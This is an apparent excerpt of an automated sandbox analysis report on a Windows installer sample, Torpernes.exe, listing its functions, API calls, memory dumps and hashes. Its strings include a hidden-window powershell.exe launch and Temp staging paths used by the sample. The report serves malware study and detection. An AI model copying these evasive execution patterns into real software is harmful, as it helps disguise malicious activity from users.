                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "powershell.exe" -windowstyle hidden$A$C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes$Execute:
                                            • API String ID: 2624150263-314068772
                                            • Opcode ID: 0872472f253eb43d78c96496c0214350b1dc56a7ad2682dbc0c7061730063538
                                            • Instruction ID: fad5de195099c4bb125bb843149892d88f7ab0b1647696bda0d7f1fd53d0c9ab
                                            • Opcode Fuzzy Hash: 0872472f253eb43d78c96496c0214350b1dc56a7ad2682dbc0c7061730063538
                                            • Instruction Fuzzy Hash: 8DA18FB1900208ABDB11AFA5CC45AAF77B8EF85314F10843BF611B62D1D77C9A418B6D
                                            Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems, xrefs: 004020FB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CreateInstance
                                            • String ID: C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems
                                            • API String ID: 542301482-1539819606
                                            • Opcode ID: f373231bb21bdd950d0031a3fa84380e2d7a1430d357a16df16077b9457b71b4
                                            • Instruction ID: 67f9a033abe0f7de6a447e7deefe4003bd277624c69769909c070b3822ab9271
                                            • Opcode Fuzzy Hash: f373231bb21bdd950d0031a3fa84380e2d7a1430d357a16df16077b9457b71b4
                                            • Instruction Fuzzy Hash: 99415E75A00105BFCB00DFA8C988EAE7BB5EF49318B20416AF905EF2D1CA79AD41CB54
                                            Function 00402770 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: 46a75bfcdf0f655e43968d2b9fd1626b2727312735866fde2716e11fe0eeafa7
                                            • Instruction ID: b58eb35c91f3af3aa650dd11b58d04068e1d23ce00575ed06420bd268ccdbeaf
                                            • Opcode Fuzzy Hash: 46a75bfcdf0f655e43968d2b9fd1626b2727312735866fde2716e11fe0eeafa7
                                            • Instruction Fuzzy Hash: B6F05EB16101149BCB10EBA4DD499EEB378FF04318F6045BAF141F31D0D6B459409B2A
                                            Function 004041C4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404262
                                            • GetDlgItem.USER32(?,000003E8), ref: 00404276
                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404293
                                            • GetSysColor.USER32(?), ref: 004042A4
                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004042B2
                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004042C0
                                            • lstrlenW.KERNEL32(?), ref: 004042C5
                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004042D2
                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004042E7
                                            • GetDlgItem.USER32(?,0000040A), ref: 00404340
                                            • SendMessageW.USER32(00000000), ref: 00404347
                                            • GetDlgItem.USER32(?,000003E8), ref: 00404372
                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004043B5
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004043C3
                                            • SetCursor.USER32(00000000), ref: 004043C6
                                            • ShellExecuteW.SHELL32(0000070B,open,`qB,00000000,00000000,00000001), ref: 004043DB
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004043E7
                                            • SetCursor.USER32(00000000), ref: 004043EA
                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404419
                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040442B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                            • String ID: N$`qB$open
                                            • API String ID: 3615053054-3589638645
                                            • Opcode ID: 52352e1598e21c6738b30937b27fb9d187c760a63e9d8340ab691ca5d092bea6
                                            • Instruction ID: 90332823e9378a57a65084aeaf39a46f2e0fe04d3774f3cfafdc0ffa1ca1b148
                                            • Opcode Fuzzy Hash: 52352e1598e21c6738b30937b27fb9d187c760a63e9d8340ab691ca5d092bea6
                                            • Instruction Fuzzy Hash: C87161B1A00209BFDB109F64DD85E6A7B69FB84315F00843AFB05B62D1C778AD51CFA9
                                            Function 00405B37 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrcpyW.KERNEL32(00425D50,NUL), ref: 00405B47
                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405CDB,?,?,00000001,00405853,?,00000000,000000F1,?), ref: 00405B6B
                                            • GetShortPathNameW.KERNEL32(00000000,00425D50,00000400), ref: 00405B74
                                              • Part of subcall function 004059EA: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 004059FA
                                              • Part of subcall function 004059EA: lstrlenA.KERNEL32(00405C24,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 00405A2C
                                            • GetShortPathNameW.KERNEL32(?,00426550,00000400), ref: 00405B91
                                            • wsprintfA.USER32 ref: 00405BAF
                                            • GetFileSize.KERNEL32(00000000,00000000,00426550,C0000000,00000004,00426550,?,?,?,?,?), ref: 00405BEA
                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405BF9
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405C31
                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425950,00000000,-0000000A,00409530,00000000,[Rename],00000000,00000000,00000000), ref: 00405C87
                                            • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405C99
                                            • GlobalFree.KERNEL32(00000000), ref: 00405CA0
                                            • CloseHandle.KERNEL32(00000000), ref: 00405CA7
                                              • Part of subcall function 00405A85: GetFileAttributesW.KERNELBASE(00000003,00402DA9,C:\Users\user\Desktop\Torpernes.exe,80000000,00000003,?,?,?,00000000,00403455,?), ref: 00405A89
                                              • Part of subcall function 00405A85: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403455,?), ref: 00405AAB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                            • String ID: %ls=%ls$NUL$P]B$PeB$[Rename]
                                            • API String ID: 1265525490-1712624446
                                            • Opcode ID: b26fa6636d2ccb6f0e04fd9a6c311f54ca2b11ab4b2b187919472fa5f24e948f
                                            • Instruction ID: b9e722bee1e3d5643c0ee6ce27492db21a7ddaf58c344bd4a326e946b13d45f5
                                            • Opcode Fuzzy Hash: b26fa6636d2ccb6f0e04fd9a6c311f54ca2b11ab4b2b187919472fa5f24e948f
                                            • Instruction Fuzzy Hash: 5F410571A08B15BFE2206B619C49F6B3B5CDF45758F14013ABA01F22D2E63CA9018E7D
                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                            Download Yara Rule
                                            APIs
                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextW.USER32(00000000,004281C0,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: 06542edcf82c941fcb0ea04d557428ccb15455088f1b67a948e491e3148a3cff
                                            • Instruction ID: 3444b066cc79e46fd946f20d531651005d710df5863fb735ae49ac58aced53cb
                                            • Opcode Fuzzy Hash: 06542edcf82c941fcb0ea04d557428ccb15455088f1b67a948e491e3148a3cff
                                            • Instruction Fuzzy Hash: 4E418A71804249AFCB058FA5DD459BFBBB9FF48310F00812AF951AA1A0C738EA51DFA5
                                            Function 004060AD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                            Download Yara Rule
                                            APIs
                                            • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Torpernes.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406110
                                            • CharNextW.USER32(?,?,?,00000000), ref: 0040611F
                                            • CharNextW.USER32(?,"C:\Users\user\Desktop\Torpernes.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406124
                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406137
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\Torpernes.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 589700163-4110420224
                                            • Opcode ID: b7edfb63e30c9305099e6cc7fb0a64cc7777acb6978fb1fb85fc979881d03aaa
                                            • Instruction ID: 4a2c8b93f3f00ad1f037595bc6cc76d7c6216582d8143effd024cbcf063a8f89
                                            • Opcode Fuzzy Hash: b7edfb63e30c9305099e6cc7fb0a64cc7777acb6978fb1fb85fc979881d03aaa
                                            • Instruction Fuzzy Hash: 7B11B62684022295DB317B148C44AB7B6B8EF54790F56803FED96732C1E77C5CA286AD
                                            Function 0040408E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetWindowLongW.USER32(?,000000EB), ref: 004040AB
                                            • GetSysColor.USER32(00000000), ref: 004040C7
                                            • SetTextColor.GDI32(?,00000000), ref: 004040D3
                                            • SetBkMode.GDI32(?,?), ref: 004040DF
                                            • GetSysColor.USER32(?), ref: 004040F2
                                            • SetBkColor.GDI32(?,?), ref: 00404102
                                            • DeleteObject.GDI32(?), ref: 0040411C
                                            • CreateBrushIndirect.GDI32(?), ref: 00404126
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                            • Instruction ID: c86db10b712075dc0fdd11195a27afd72c2c4955ef31593f119c7b4a1354f6c1
                                            • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                            • Instruction Fuzzy Hash: 012196B1904744ABCB319F68DD08B4BBBF8AF40714F048629E991F66E0C738E944CB65
                                            Function 004027B5 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                            • GlobalFree.KERNEL32(00000000), ref: 00402877
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                            • String ID:
                                            • API String ID: 3294113728-0
                                            • Opcode ID: 5978231e7d85de4122752ab0311afae4d845248ff6fec9fde577dd7b0cd2e14d
                                            • Instruction ID: 0a6bca8ecd63676026edbfb1c3c3c77fca9f2a16f8acb5fc7edd4aca8780f57a
                                            • Opcode Fuzzy Hash: 5978231e7d85de4122752ab0311afae4d845248ff6fec9fde577dd7b0cd2e14d
                                            • Instruction Fuzzy Hash: F231C471C00118BBDF11AFA5CE49DAF7E79EF08364F24423AF910762D1C6795E418BA9
                                            Function 004024EE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(?,?,0040A568,000000FF,skdeskindene,00000400,?,?,00000021), ref: 0040252F
                                            • lstrlenA.KERNEL32(skdeskindene,?,?,0040A568,000000FF,skdeskindene,00000400,?,?,00000021), ref: 00402536
                                            • WriteFile.KERNEL32(00000000,?,skdeskindene,00000000,?,?,00000000,00000011), ref: 00402568
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: ByteCharFileMultiWideWritelstrlen
                                            • String ID: 8$skdeskindene
                                            • API String ID: 1453599865-1245938444
                                            • Opcode ID: c626b69330e8d4113f8ae470d47427ea8bcabb27d685ee7f6299361e041b6526
                                            • Instruction ID: cff9808fb2b52db1cc78eea84bd95fecff25b82700627aa87d7ff40e926b01d0
                                            • Opcode Fuzzy Hash: c626b69330e8d4113f8ae470d47427ea8bcabb27d685ee7f6299361e041b6526
                                            • Instruction Fuzzy Hash: D6019271A44204FBD710AFB09E8AEAB7278EF50319F20443BB102B61D1D2BC4E41DA2D
                                            Function 0040498B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004049A6
